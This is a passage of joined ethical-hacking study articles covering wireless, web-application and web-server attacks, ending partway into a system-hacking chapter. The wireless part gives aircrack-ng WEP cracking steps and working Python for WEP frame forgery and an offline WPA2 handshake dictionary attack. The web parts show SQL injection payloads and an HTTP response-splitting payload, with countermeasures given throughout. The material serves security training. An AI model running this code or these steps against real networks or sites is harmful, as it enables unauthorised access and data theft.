  • Dipole Antenna: A dipole antenna or doublet is the simplest and most widely used class of antenna. The dipole is any one of a class of antennas producing a radiation pattern approximating that of an elementary electric dipole with a radiating structure supporting a line current so energized that the current has only one node at each end.

Wireless Encryption

WEP

Wired Equivalent Privacy (WEP), introduced as part of the original 802.11 standard ratified in 1997, was for years the most widely used Wi-Fi security protocol. It is recognisable by its key of 10 or 26 hexadecimal digits (40 or 104 bits); the marketed "64-bit" and "128-bit" (most common) variants are these keys plus the 24-bit initialisation vector (IV), and a rarer 256-bit variant also existed. In 2004, both WEP-40 and WEP-104 were declared deprecated: the IV space is tiny and IVs repeat, RC4's first keystream bytes leak information about the IV||key seed, and the CRC-32 integrity check is linear, so attackers with ever-increasing computing power exploit these flaws to recover the key in minutes. All in all, this protocol is "dead".

Breaking this encryption can be performed by following the next steps (the tool names are those of the Aircrack-ng suite mentioned below):

  • Put the wireless interface into monitor mode and lock it to the access point's channel (airmon-ng, airodump-ng).
  • Test the injection capability against the access point (aireplay-ng -9).
  • Use fake authentication to associate with the access point so that it accepts injected frames (aireplay-ng -1).
  • Capture the traffic in the network, saving the packets and their IVs to a file (airodump-ng -w).
  • Inject packets, typically by replaying captured ARP requests, so that the access point generates many new IVs quickly (aireplay-ng -3).
  • Run a cracking tool over the captured IVs to recover the encryption key (aircrack-ng).
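The following Python example is added here and is not part of the original article or of the Aircrack-ng suite. It implements WEP's framing (RC4 keyed with IV || key, CRC-32 integrity check value) over a constructed 40-bit key, IV and plaintext, and shows two of the flaws the steps above rely on: two frames sent under the same IV leak the XOR of their plaintexts, and because CRC-32 is linear an encrypted frame can be modified in transit while keeping its ICV valid. The statistical key recovery that aircrack-ng performs over collected IVs (FMS/KoreK/PTW) is not implemented here.

```python
import struct
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 keystream generator; WEP seeds it with IV || key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV (3 bytes, sent in clear) || RC4(IV || key) XOR (plaintext || ICV)."""
    data = plaintext + icv(plaintext)
    return iv + xor(data, rc4(iv + key, len(data)))


def wep_decrypt(key: bytes, frame: bytes):
    """Returns (plaintext, icv_ok)."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4(iv + key, len(body)))
    plaintext = data[:-4]
    return plaintext, data[-4:] == icv(plaintext)


def keystream_reuse(frame_a: bytes, frame_b: bytes) -> bytes:
    """Two frames under the same IV share a keystream, so C1 XOR C2 == P1 XOR P2
    (ICV included); no key is needed."""
    assert frame_a[:3] == frame_b[:3], "same IV required"
    return xor(frame_a[3:], frame_b[3:])


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Modify an encrypted frame without the key. CRC-32 is affine, so
    crc(p XOR delta) == crc(p) XOR crc(delta) XOR crc(zeros); XORing that
    correction into the encrypted ICV keeps the frame valid."""
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4
    assert len(delta) == n, "delta must cover the whole plaintext"
    icv_delta = xor(icv(delta), icv(bytes(n)))
    return iv + xor(body, delta + icv_delta)


# Constructed sample values: a 40-bit WEP key and a 24-bit IV, not real traffic.
KEY = bytes.fromhex("0102030405")
IV = b"\x00\x01\x02"

if __name__ == "__main__":
    frame = wep_encrypt(KEY, IV, b"GET /admin HTTP/1.0")
    # Turn "admin" into "index" in transit; the receiver still sees a valid ICV.
    delta = bytes(5) + xor(b"admin", b"index") + bytes(9)
    print(wep_decrypt(KEY, flip_bits(frame, delta)))
```

The bit-flip is the building block of the Chop-Chop style attacks mentioned under TKIP below, and the keystream reuse is why the ARP replay step matters: every replayed packet forces the access point to spend another IV from a space of only 2^24.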

WPA

Wi-Fi Protected Access (WPA), became available in 2003, and it was the Wi-Fi Alliance’s direct response and replacement to the increasingly apparent vulnerabilities of the WEP encryption standard. The most common WPA configuration is WPA-PSK (Pre-Shared Key). The keys used by WPA are 256-bit, a significant increase over the 64-bit and 128-bit keys used in the WEP system.

WPA included message integrity checks (to determine if an attacker had captured/altered packets passed between the access point and client) and the Temporal Key Integrity Protocol (TKIP). TKIP employs a per-packet key system that was radically more secure than the fixed key system used by WEP. TKIP was later superseded by CCMP, which is built on the Advanced Encryption Standard (AES).

TKIP still uses RC4 and WEP-style framing underneath and consequently is vulnerable to a number of similar attacks (e.g. Chop-Chop and the Beck-Tews MIC key recovery attack).

Usually, people do not attack the WPA protocol directly but a supplementary system that was rolled out with it, Wi-Fi Protected Setup (WPS): its 8-digit PIN is verified in two halves, so it can be brute-forced online in roughly 11,000 attempts, after which the access point hands over the WPA passphrase.

WPA2

WPA2 replaced WPA. Certification began in September 2004 and from March 13, 2006, it was mandatory for all new devices bearing the Wi-Fi trademark. The most important upgrade is the mandatory use of AES (instead of the RC4 used by WEP and TKIP) and the introduction of CCMP (Counter Mode with CBC-MAC Protocol, AES with 128-bit keys) as a replacement for TKIP, which is still present in WPA2 as a fallback for interoperability with WPA clients. The pre-shared key mode is still only as strong as the passphrase: the PMK is derived from the passphrase and the SSID, and a captured four-way handshake can be attacked offline with a dictionary.
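As an added example (not code from the original article), the Python below carries the WPA-PSK key management described above through to the attack on WPA2: the PMK from passphrase and SSID with PBKDF2, the PTK via the 802.11i PRF, the KCK-keyed MIC over EAPOL-Key message 2, and the offline dictionary attack that tools like aircrack-ng run against a captured four-way handshake. The SSID, MAC addresses, nonces and wordlist are constructed values; the EAPOL-Key frame layout is the real one so the MIC sits at its true offset. derive_pmk reproduces the IEEE 802.11i test vector (passphrase "password", SSID "IEEE").

```python
import hashlib
import hmac

# Offset of the 16-byte Key MIC field inside an EAPOL-Key frame: EAPOL header (4)
# + descriptor type (1) + key info (2) + key length (2) + replay counter (8)
# + key nonce (32) + key IV (16) + key RSC (8) + key ID (8) = 81
MIC_OFFSET = 81


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || counter) blocks, concatenated."""
    out = b""
    for counter in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces)).
    For CCMP the PTK is 48 bytes: KCK (16) || KEK (16) || TK (16); the KCK keys the handshake MIC."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with the MIC field zeroed)[:16]."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP): RSN descriptor (2), key info 0x010a
    (MIC bit, pairwise, descriptor version 2), key length 0, replay counter 1, SNonce,
    zero IV/RSC/ID, MIC, empty key data."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x00" + (1).to_bytes(8, "big")
            + snonce + bytes(16) + bytes(8) + bytes(8) + mic + b"\x00\x00")
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def client_handshake_msg2(passphrase, ssid, ap_mac, client_mac, anonce, snonce) -> bytes:
    """What a sniffer captures: the client's message 2 carrying a MIC under the real passphrase."""
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    return build_msg2(snonce, eapol_mic(kck, build_msg2(snonce)))


def crack_handshake(msg2, wordlist, ssid, ap_mac, client_mac, anonce, snonce):
    """Offline dictionary attack: recompute the MIC for each candidate passphrase and compare.
    Everything else needed (SSID, MACs, nonces) is visible in the capture. Returns the match or None."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(derive_pmk(candidate, ssid), ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return candidate
    return None


# Constructed sample values (not from a real capture).
SSID = "ExampleNet"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))

if __name__ == "__main__":
    captured = client_handshake_msg2("correct horse", SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    print(crack_handshake(captured, ["123456", "password", "correct horse"],
                          SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE))
```

The 4096 PBKDF2 rounds are the only thing slowing the attacker down, and they are fixed by the standard, so the defence is passphrase entropy (or WPA2-Enterprise, where there is no shared passphrase to guess). Note also that the SSID is a salt: a passphrase reused across a common SSID such as "linksys" can be attacked with precomputed PMK tables.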

Wireless Threats

  • Access control attacks: Attackers obtain access to a network they are not authorised to use.
  • Integrity and confidentiality attacks: Attackers intercept or alter confidential information going through the network.
  • Availability attacks: Attackers prevent legitimate users from accessing the network.
  • Authentication attacks: Attackers try to impersonate legitimate users of the network.
  • Rogue access point attacks: By starting a rogue access point with the same SSID as an existing, legitimate one in the same location, attackers try to gain access to the network and to the traffic of the clients that connect to them.
  • Client mis-association: Placing a rogue access point outside the areas where the legitimate ones are, to take advantage of the auto-connect setting in user devices and capture the traffic they generate.
  • Misconfigured access point attacks: Attackers gain access to existing access points by taking advantage of misconfigurations on the device.
  • Unauthorised association: By taking advantage of a user's trojanised computer, which acts as a bridge, attackers are able to connect to private networks.
  • Ad-hoc connection attacks: Ad-hoc connections tend to be insecure because they do not provide strong authentication and encryption, making it possible for attackers to take advantage of them.
  • Jamming signal attacks: By simply emitting an interference signal, a jamming attacker can effectively block the communication on a wireless channel, disrupt normal operation, cause performance issues and even damage the control system.

Wireless Attack Methodology

  • Wi-Fi discovery: Collect information by active footprinting.
  • GPS mapping: Creation of a list of existing access points and their locations.
  • Wireless traffic analysis: Capturing packets to reveal any information about the access point and the network.
  • Launch wireless attacks: Using a tool like Aircrack-ng to run one or multiple of the possible attacks against a wireless network.

Bluetooth Hacking

Bluetooth is a wireless technology found in pretty much every phone you can get your hands on, and in many other devices and gadgets around the home and the office, such as laptops, speakers and headphones. Bluetooth connects devices that are in close proximity, cutting down on cables and giving you flexibility and freedom. It is designed for relatively short distances: it typically works over a range of less than 100 metres, and most consumer devices (Class 2) reach about 10 metres. The range has been intentionally limited in order to keep its power drain to a minimum. Bluetooth operates in the 2.4 GHz ISM band, hopping between channels (FHSS).

Bluetooth has a discovery feature that enables devices to be discoverable by other Bluetooth devices.

Bluetooth Attacks

  • BlueSmacking: Basically, a DoS attack against a Bluetooth device overflowing it with random packets, for example, echo packets.
  • BlueBugging: Attackers exploit a vulnerability in the device to take control of it, for example to place calls, read or send messages, or eavesdrop on conversations, without the owner noticing.
  • BlueJacking: It is the act of sending unsolicited messages to Bluetooth enabled devices.
  • BluePrinting: It is a method or technique to extract information and details about a remote device. Information such as firmware, manufacturers information, model, etc.
  • BlueSnarfing: Exploiting security vulnerabilities, attackers steal the information on Bluetooth devices.

Bluetooth Countermeasures

  • Keep checking the paired devices list.
  • Keep devices in non-discoverable mode.
  • Use a strong PIN for pairing.
  • Use encryption.
  • Install host-based security.
  • Do not accept unknown or suspicious pairing or connection requests.
  • When idle, keep your Bluetooth disabled.

Wireless Security Tools

Wireless Intrusion Prevention Systems

A wireless intrusion prevention system (WIPS) operates at the Layer 2 (data link layer) level of the Open Systems Interconnection model. WIPS can detect the presence of rogue or misconfigured devices and can prevent them from operating on wireless enterprise networks by scanning the network’s RFs for denial of service and other forms of attack.

WIDS monitors the radio spectrum for the presence of unauthorized, rogue access points and the use of wireless attack tools. The system monitors the radio spectrum used by wireless LANs, and immediately alerts a systems administrator whenever a rogue access point is detected. Conventionally it is achieved by comparing the MAC address of the participating wireless devices.

Wi-Fi Security Auditing Tool

There are several tools defenders can use to audit, troubleshoot, detect and prevent intrusions, mitigate threats, detect rogue devices, protect against zero-day threats, investigate incidents (forensics) and create compliance reports, helping to protect wireless networks. Tools like:

  • AirMagnet Wi-Fi Analyser
  • Motorola's AirDefense Services Platform (ADSP)
  • Cisco Adaptive Wireless IPS
  • Aruba RFProtect

In addition, SANS has a whitepaper with the title Wireless Network Audits using Open Source tools.

Countermeasures

Multiple techniques and practices can be adopted to prevent attacks on wireless networks, some of them already discussed, such as using monitoring and auditing tools, configuring strict access control policies, following best practices and using appropriate encryption like WPA2 with strong authentication. Some of these basic techniques are:

  • Access point scanning
  • Change default parameters
  • Disable remote login for wireless devices
  • Wireless IPS deployment
  • Configuring WPA2 with AES for data protection
  • Choose strong passwords
  • RF scanning
  • MAC filtering
  • Disable SSID broadcast
  • Update software and patches
  • Blocking rogue access points
  • Per-packet authentication
  • Strong authentication
  • Enable firewall protection
  • Network management software
CEH (XVII): Hacking Wireless Networks

CEH (XV): Hacking Web Applications

The index of this series of articles can be found here.

Hundreds of thousands, millions, even billions of systems are online nowadays. They offer services to their users and, in some cases, such as critical systems, they are indispensable. Some of these online services are web applications running on web servers. Organisations have embraced them and they are not just used in the corporate sector to perform important and, sometimes, critical tasks; they have expanded globally for social and entertainment purposes.

Web applications present a great security challenge. They need high availability and smooth performance but they are always exposed to a big number of users. For all these reasons, ensuring security measures and eliminating vulnerabilities is crucial.

Some Concepts

A web application is an application that runs on a remote server and is available to clients over the Internet. Access is offered through clients, sometimes just the browser, sometimes specialised client software. These clients can be very complex, with code or logic of their own, or thin ("dummy") clients where all the logic resides at the server.

Server Administrator

The person who takes care of the web server in terms of safety, security, functioning and performance. They are responsible for assessing security measures, deploying security models and finding and eliminating vulnerabilities.

Application Administrator

The person responsible for the management and configuration required by the web application. They ensure the availability and high performance of the web application.

Client

Clients are designed to interact with the web applications and they can range from simple dummy clients to very complex ones.

Web Application Threats

Multiple different threats apply to web applications:

  • Insecure storage: The software stores sensitive information without properly limiting read or write access by unauthorised actors.
  • Information leakage: A system that is designed to be closed to an eavesdropper nonetheless reveals information (error messages, stack traces, version banners, comments in pages) to unauthorised parties.
  • Directory traversal: Directory (or path) traversal is an HTTP attack in which sequences such as ../ in a file name parameter let attackers read files outside the web server's root directory and, in some cases, execute commands.
  • Parameter/Form tampering: Parameter tampering is a form of web-based attack in which certain parameters in the Uniform Resource Locator (URL) or web page form field data entered by a user are changed without that user's authorisation.
  • DoS Attacks: A denial-of-service attack (DoS attack) is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet.
  • Buffer overflow: Buffer overflow is an anomaly that occurs when software writing data to a buffer overflows the buffer's capacity, resulting in adjacent memory locations being overwritten. In other words, too much information is being passed into a container that does not have enough space, and that information ends up replacing data in adjacent containers.
  • Log tampering: Web log tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs, typically for the purpose of masking other malicious behaviour. Additionally, writing malicious data to log files may target jobs, filters, reports and other agents that process the logs in an asynchronous attack pattern.
  • Injection: Injection is the placement of malicious code via an input.
    • SQL injection: SQL injection is the placement of malicious code in SQL statements, via web page input.
    • Command injection: Command injection is an attack in which the goal is the execution of arbitrary commands on the host operating system via a vulnerable application.
    • LDAP injection: LDAP injection is a crafted query that can manipulate vulnerable LDAP servers, leading to serious cases of data and identity theft.
    • SMTP injection: Inserting extra lines (for example additional recipients or headers) into the mail an application sends, through a form field that is copied into the SMTP conversation.
    • XPath injection: Manipulating the XPath query an application builds from user input in order to read arbitrary parts of an XML document or bypass checks.
  • Cross-site scripting: Cross-site scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.
  • Cross-site request forgery: Cross-site request forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated.
  • Security misconfiguration: Security misconfiguration is simply defined as failing to implement all the security controls for a server or web application, or implementing the security controls but doing so with errors.
  • Broken session management: Weaknesses of the session management system such as:
    • User authentication credentials are not protected when stored.
    • Credentials can be guessed or overwritten through weak account management functions (registration, password change, password recovery).
    • Session IDs are exposed in the URL.
    • Session IDs are vulnerable to session fixation attacks.
    • Sessions do not time out or are not invalidated after logout.
    • Session IDs are not rotated after successful login.
    • Passwords, session IDs and other credentials are sent over unencrypted connections.
  • DMZ attack: Attacks that compromise a host in the DMZ and use it to reach the internal network the DMZ was meant to isolate.
  • Session Hijacking: The session hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorised access to the web server.
  • Network Access Attacks: Any attempt to access another user's account or a network device through improper means.
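To make the injection entries concrete, here is an added Python example (not from the original article) using an in-memory SQLite database with constructed rows: a login check that builds its SQL by string formatting beside one that binds parameters, with the classic comment and tautology payloads run against both.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory users table with constructed sample rows (not real data). Passwords are
    stored in clear only to keep the demo short; that is the 'insecure storage' item above."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")])
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Query built by string formatting: user input becomes part of the SQL grammar.
    Returns (username, role) for the first matching row, or None."""
    query = ("SELECT username, role FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(query).fetchone()


def login_parameterised(conn, username: str, password: str):
    """Same check with bound parameters: the driver passes input as data, so quotes,
    comment markers and OR clauses inside it are compared literally."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    # Comment payload: the trailing "--" removes the password check from the statement.
    print(login_vulnerable(db, "alice'--", "anything"))
    # Tautology payload: "... AND password = '' OR '1'='1'" matches every row.
    print(login_vulnerable(db, "nobody", "' OR '1'='1"))
    print(login_parameterised(db, "alice'--", "anything"))
```

The tautology payload works because AND binds tighter than OR, so the attacker's OR applies to the whole condition; the parameterised version returns nothing for both payloads because there is no username literally called alice'-- and no password literally equal to the injected string.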

Web Application Pentesting

One of the tools security professionals have to prevent attacks is pentesting. In a pentest, a security professional takes the place of an attacker and tries to break into systems, so that the problems found can be fixed before they are exploited. A pentest tries to cover the same ground an attacker would cover:

  • Collection of information
  • Configuration testing
  • Authentication testing
  • Session testing
  • Authorisation testing
  • Data validation
  • DoS testing
  • Web services testing
  • Document findings

Web Application Attack Methodology

  • Analyse web application: Observe the functionality and input parameters to identify vulnerabilities, entry points and server technologies that can be exploited. HTTP requests and HTTP fingerprinting techniques are used to identify the server software and the parameters it accepts.
  • Attack authentication mechanism: Trying to bypass authentication. Some attack mechanisms are:
    • User enumeration
    • Cookie exploitation
    • Session attacks
    • Passwords attacks
  • Authorisation attack schemes: Using different techniques to manipulate URLs, requests, POST data, query strings, cookies, parameters, HTTP headers, etc. to escalate privileges once low-level access has been achieved.
  • Session management attack: There are different techniques that can be used to impersonate a legitimate user:
    • Session token prediction
    • Session token tampering
    • Man-in-the-middle attack
    • Session replay
  • Attack data connectivity: Designed to exploit the connection between a server and a database. It includes:
    • Connection string injection
    • Connection string parameters pollution (CSPP)
    • Connection Pool DoS

Countermeasures

There are literally hundreds of things that can be done to mitigate web application attacks, too many to list here, but a great starting point is the OWASP Top 10 project, which explains the ten most common classes of vulnerability, how they work and possible ways to mitigate them.


CEH (XIV): Hacking Web Servers

The index of this series of articles can be found here.

A web server is server software or hardware dedicated to running this software, that can satisfy client requests on the World Wide Web. A web server can, in general, contain one or more websites. A web server processes incoming network requests over HTTP and several other related protocols. The primary function of a web server is to store, process and deliver web pages to clients.

On the hardware side, a web server is a computer that stores web server software and a website’s component files (e.g. HTML documents, images, CSS stylesheets, and JavaScript files). It is connected to the Internet and supports physical data interchange with other devices connected to the web.

On the software side, a web server includes several parts that control how web users access hosted files, at a minimum an HTTP server. An HTTP server is a piece of software that understands URLs and HTTP. It can be accessed through the domain names and, it stores and delivers their content to the end-users device.

Some Concepts

Web Server Security Issue

Security issues for web servers may include network-level and operating system-level attacks. Usually, attackers target vulnerabilities or mistakes in the configuration and exploit them. These vulnerabilities may include:

  • Improper permissions on files and directories
  • Default configurations
  • Unnecessary services enabled
  • Lack of proper security policies and procedures
  • Bugs
  • Misconfigured SSL certificates
  • Enabled debugging

Once a web server has been compromised, the result can be the compromise of all user accounts, denial of the services the server offers, defacement, further attacks launched from the compromised web server, and access to its resources and data.

Open Source Web Servers

They are servers whose code is publicly available and maintained by open source communities. They can be hosted on-premises or by third-party companies. Examples are:

  • Apache HTTP Server
  • NGINX
  • Apache Tomcat
  • Lighttpd
  • Node.js (a JavaScript runtime whose standard library is commonly used to implement HTTP servers)

IIS Web Server

Internet Information Services (IIS) is a Windows-based web server which provides a request processing architecture. IIS contains multiple components which are responsible for several functions such as listening for requests, managing worker processes, reading configuration files, etc. Some of these components are:

  • Protocol listener: Protocol listeners are responsible for receiving protocol-specific requests. They forward these requests to IIS for processing and then return responses to requestors.
  • HTTP.sys: The HTTP listener is implemented as a kernel-mode device driver called the HTTP protocol stack (HTTP.sys). HTTP.sys is responsible for listening for HTTP requests, forwarding them to IIS for processing and returning the processed responses to client browsers.
  • WWW Service and WAS: The World Wide Web Publishing Service (WWW Service) and the Windows Process Activation Service (WAS) run in svchost.exe on the local system and share the same binaries. Before version 7 the WWW Service handled everything; from IIS 7 onward WAS manages configuration and worker processes, while the WWW Service adapts HTTP.sys to it.

Web Server Attacks

A lot of attack techniques can be found for web servers; some of them are listed below:

  • DoS/DDoS attack: Flooding the web server with fake requests, resulting in crashes, unavailability or denial of service for all users.
  • DNS server hijacking: By compromising the DNS configuration, attackers can redirect requests targeting a web server to a malicious server owned or controlled by them.
  • DNS amplification attack: Using open DNS recursive resolvers, attackers spoof lookup requests from the victim's address for records whose responses are far larger than the requests, turning the resolvers into DDoS traffic sources.
  • Directory traversal attacks: Using trial and error, attackers access restricted directories with dot and slash sequences (../), revealing sensitive information.
  • Man-in-the-middle/sniffing attacks: Attackers intercept and extract sensitive information, or alter packets in transit.
  • Phishing attacks: Using phishing, attackers obtain legitimate user credentials and use them to compromise a web server.
  • Website defacement: After a successful intrusion, attackers alter or modify the content or appearance of a website.
  • Web server misconfiguration: Default features or credentials, misconfigurations, default certificates, active debugging capabilities, unnecessary services running, etc. All of this can help attackers compromise a web server.
  • HTTP response splitting attacks: HTTP response splitting is a form of web application vulnerability resulting from the failure of the application or its environment to properly sanitise input values. The attack consists of making the server emit a carriage return (CR, ASCII 0x0D) line feed (LF, ASCII 0x0A) sequence followed by attacker-supplied content in the header section of its response, typically by including them in input fields sent to the application. Per the HTTP standard, headers are separated by one CRLF and the response's headers are separated from its body by two. Therefore, the failure to remove CRs and LFs allows the attacker to set arbitrary headers, take control of the body, or break the response into two or more separate responses, hence the name.
  • Web cache poisoning attacks: Attackers send crafted requests so that a web cache stores attacker-controlled entries, which are then served to other users, for example to redirect them to malicious websites.
  • SSH brute-force attacks: Obtaining unauthorised access by brute-forcing credentials for an exposed SSH service, which then gives the attacker an encrypted channel onto the server.
  • Web application attacks: Web servers run web applications, among other things. A vulnerability in any of those applications can be used to affect the web server.
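An added Python example (not from the original article) of the HTTP response splitting mechanism described above: a redirect handler that copies a user-supplied Location value into its headers, a minimal response parser standing in for a downstream proxy or cache, and the hardened handler that rejects CR/LF. The payload and URLs are constructed.

```python
def build_redirect_vulnerable(location: str) -> bytes:
    """Copies the user-controlled value into a header with no CR/LF check."""
    return f"HTTP/1.1 302 Found\r\nLocation: {location}\r\n\r\n".encode("latin-1")


def build_redirect_hardened(location: str) -> bytes:
    """Same handler with the fix: a header value may never contain CR or LF."""
    if "\r" in location or "\n" in location:
        raise ValueError("CR/LF not allowed in a header value")
    return f"HTTP/1.1 302 Found\r\nLocation: {location}\r\n\r\n".encode("latin-1")


def parse_responses(raw: bytes) -> list:
    """Minimal HTTP/1.x response parser standing in for a proxy or cache. Returns a
    list of (status_line, headers, body). Headers end at the first CRLF CRLF; the body
    length comes from Content-Length; whatever follows is read as the next response."""
    responses = []
    pos = 0
    while pos < len(raw):
        while raw.startswith(b"\r\n", pos):  # tolerate blank lines between messages
            pos += 2
        if pos >= len(raw):
            break
        head_end = raw.index(b"\r\n\r\n", pos)
        lines = raw[pos:head_end].decode("latin-1").split("\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = head_end + 4
        length = int(headers.get("content-length", "0"))
        responses.append((lines[0], headers, raw[body_start:body_start + length]))
        pos = body_start + length
    return responses


# Constructed attacker value for the redirect parameter: a plausible URL, then CRLF CRLF
# to close the 302's headers, then a complete second response of the attacker's choosing.
PAYLOAD = (
    "http://example.test/\r\n"
    "\r\n"
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 16\r\n"
    "\r\n"
    "<h1>Defaced</h1>"
)

if __name__ == "__main__":
    for status, _, body in parse_responses(build_redirect_vulnerable(PAYLOAD)):
        print(status, body)
```

In a real attack the user-controlled value arrives URL-encoded (%0d%0a) and is decoded by the framework before reaching the handler, and the second response is what a shared cache or the victim's browser keeps for the next request, which is how splitting turns into cache poisoning or XSS.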

Web Server Attack Methodology

  • Web server footprinting: Footprinting focused on a web server using tools like Maltego, Netcraft, Httprecon, etc. It usually reveals the server name, type, operating system, running applications and other interesting information about the target.
  • Mirroring a website: Download a copy of an entire website to explore it offline and look for vulnerabilities without constant contact with the web server.
  • Vulnerability scanner: Vulnerability scanners are automated tools specially designed to find vulnerabilities, weaknesses, problems and holes in the operating system, network, software or applications. They inspect scripts, open ports, banners, running services, configuration and other areas.
  • Session Hijacking: As established before, stealing a legitimate session to access the web server.
  • Hacking web passwords: Password cracking is a very common technique where attackers break the security of credentials using different methods like:
    • Non-electronic attacks
    • Active online attacks
    • Passive online attacks
    • Default passwords
    • Offline attacks

Countermeasures

The basic recommendation is to place the web servers in a secure zone protected by appropriate tools, like the IDS and firewalls we have seen in previous chapters. Placing the servers in an isolated zone such as a DMZ can protect them from threats.

A few specific measures can be:

  • Auditing ports
  • Disabling insecure and unnecessary ports
  • Using port 443 HTTPS over 80 HTTP
  • Encrypted traffic
  • Server certificates
  • Code access security policies
  • Disable tracing
  • Disable debug compiles

Patch Management

A very important action to be taken to maintain web servers secure is to have a patch management policy to be able to incorporate updates or hotfixes fixing known security problems.

This process can be manual or automatic, the latter being preferred. A patch management system should perform the following tasks:

  1. Detect missing security patches
  2. Find out the solution
  3. Download the patch
  4. Test the patch in an isolated environment
  5. Deploy the patch into the rest of the systems

CEH (VII): System Hacking

The index of this series of articles can be found here.

At this point, attackers have gathered, or should have gathered, enough information to try to compromise the target systems.

This is, without question, the most difficult phase of an attack or a pentest. In both cases, patience, tenacity and perseverance are needed. Failures are going to happen, theories are going to be proven wrong, mistakes are going to be made and disappointments are going to happen. After all of this, maybe, attackers or security professionals will get some results. But, as Thomas Edison said, “I did not fail. I just found 2,000 ways not to make a lightbulb; I only needed to find one way to make it work.” Attackers do not fail, they just need to find one way to compromise the system to achieve their objective.

Compromising a system is not a matter of whether it will happen or not; it is just a matter of the time and resources needed to do it. Security professionals try to increase the time needed as much as possible and attackers reduce it as much as they can. A system will never be completely secure but, if it is secure enough, the time and resources that would have to be invested will not be worth it. There will still be attempts just for fun, curiosity or as a challenge, but the ratio of potentially serious attacks will be lower.

Compromising a system is a very broad term. The intentions of an attacker when compromising a system are:

  • Gain access
  • Privilege escalation
  • Maintain remote access
  • Steal information, data or any other type of asset
  • Cleaning and hiding evidence of the attack

There are multiple system hacking methodologies that, at least, include the following steps and match the concept of compromising a system:

  1. Cracking passwords
  2. Escalating privileges
  3. Executing applications
  4. Hiding files
  5. Covering tracks

Password Cracking

It is said that a secure system should base its strength on three factors:

  • Something the user knows, like credentials i.e. username and password.
  • Something the user is, like biometrics.
  • Something the user has, like a security card or a token generator.

Implementing all three mechanisms is, perhaps, not a simple approach, and only very secure systems use it. Nowadays there is a tendency towards second-factor authentication, usually based on something the user knows and something the user has. This is an excellent tendency that should be mainstream. But the unfortunate reality is that a lot of systems are protected just by a pair of username and password.

If attackers have been diligent enough, at this point they will have a list of enumerated usernames to try against the target systems. This is where password cracking plays an important part. Guessable passwords, short passwords, passwords protected with weak encryption, and simple passwords with only letters and/or numbers make it easy for attackers to crack them.

The best defence against these password cracking techniques is to have a strong, long password that is difficult to guess. Typically, a good password contains:

  • Case sensitive letters
  • Special characters
  • Numbers
  • At least 8 characters, if not more

Types of Password Attacks

Non-Electronic Attacks

